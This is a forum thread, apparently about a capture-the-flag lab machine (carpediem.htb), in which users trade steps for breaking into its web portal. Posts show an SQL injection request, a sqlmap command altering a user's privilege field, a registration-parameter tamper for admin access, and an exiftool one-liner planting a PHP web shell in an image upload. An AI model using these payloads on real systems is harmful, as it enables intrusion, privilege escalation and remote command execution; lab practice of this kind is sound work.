Posts: 104 Threads: 0 Joined: N/A (June 25, 2022, 08:36 PM)Toto Wrote: (June 25, 2022, 08:31 PM)hacker1111 Wrote: (June 25, 2022, 08:27 PM)Toto Wrote: (June 25, 2022, 08:10 PM)hacker1111 Wrote: (June 25, 2022, 08:06 PM)langetmama11 Wrote: SQLi found in id parameter
Here's the request
GET /?p=view_bike&id=c4ca4238a0b923820dcc509a6f75849b HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=f6204505d2b42d3bbf2851c7c848a294
Upgrade-Insecure-Requests: 1
Was able to dump the whole db which include the admin password in md5 but was unable to decrypt it
Also found something interesting in the DB statiing a file named 'Sales_Report.xlsx'
Currently fuzzing to find this file
Note: Seems like the admin has uploaded an avatar. We need to get admin to upload shell i suppose
there's login_type parameter changed to 1 and you can access /admin after that
Where did you find this parameter ?
update your profile and intercept req. in burp
Okay thanks, missed it for some reason. Anyone got any success with uploading images ? https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path Posts: 36 Threads: 0 Joined: N/A (June 25, 2022, 08:40 PM)hacker1111 Wrote: (June 25, 2022, 08:36 PM)Toto Wrote: (June 25, 2022, 08:31 PM)hacker1111 Wrote: (June 25, 2022, 08:27 PM)Toto Wrote: (June 25, 2022, 08:10 PM)hacker1111 Wrote: there's login_type parameter changed to 1 and you can access /admin after that
Where did you find this parameter ?
update your profile and intercept req. in burp
Okay thanks, missed it for some reason. Anyone got any success with uploading images ?
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards. Posts: 17 Threads: 0 Joined: N/A http://portal.carpediem.htb/admin/report/
this is accessable.
couldn't get anything from it though Posts: 12 Threads: 0 Joined: N/A Hello i can't update my profil using sqlmap
sqlmap -r req --sql-query="UPDATE portal.users SET login_type = 1 WHERE id=2;" Posts: 81 Threads: 0 Joined: N/A On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell Posts: 17 Threads: 0 Joined: N/A (June 25, 2022, 08:53 PM)netrise Wrote: Hello i can't update my profil using sqlmap
sqlmap -r req --sql-query="UPDATE portal.users SET login_type = 1 WHERE id=2;" then can u change the admin's password? tell me if it worked Posts: 213 Threads: 0 Joined: N/A (June 25, 2022, 08:53 PM)netrise Wrote: Hello i can't update my profil using sqlmap
sqlmap -r req --sql-query="UPDATE portal.users SET login_type = 1 WHERE id=2;" During registration, add login_type=1 with Burp. I tried sql queries too, but that didn't work. Posts: 104 Threads: 0 Joined: N/A (June 25, 2022, 08:50 PM)Toto Wrote: (June 25, 2022, 08:40 PM)hacker1111 Wrote: (June 25, 2022, 08:36 PM)Toto Wrote: (June 25, 2022, 08:31 PM)hacker1111 Wrote: (June 25, 2022, 08:27 PM)Toto Wrote: Where did you find this parameter ?
update your profile and intercept req. in burp
Okay thanks, missed it for some reason. Anyone got any success with uploading images ?
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards. use .png file exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png
and in burp just change ext. .png to .php and send refresh /admin user profile page and right click on broken image for full path Posts: 12 Threads: 0 Joined: N/A (June 25, 2022, 08:56 PM)Exa Wrote: (June 25, 2022, 08:53 PM)netrise Wrote: Hello i can't update my profil using sqlmap
sqlmap -r req --sql-query="UPDATE portal.users SET login_type = 1 WHERE id=2;"
During registration, add login_type=1 with Burp.
I tried sql queries too, but that didn't work. GOOD JOB, it worked Posts: 17 Threads: 0 Joined: N/A (June 25, 2022, 09:04 PM)Toto Wrote: (June 25, 2022, 08:57 PM)hacker1111 Wrote: (June 25, 2022, 08:50 PM)Toto Wrote: (June 25, 2022, 08:40 PM)hacker1111 Wrote: (June 25, 2022, 08:36 PM)Toto Wrote: Okay thanks, missed it for some reason. Anyone got any success with uploading images ?
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards.
use .png file
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png
and in burp just change ext. .png to .php and send
refresh /admin user profile page and right click on broken image for full path
Can't seem to execute anything, did you succeed in getting anything ? i can't intercept the request for upload the image on burp |
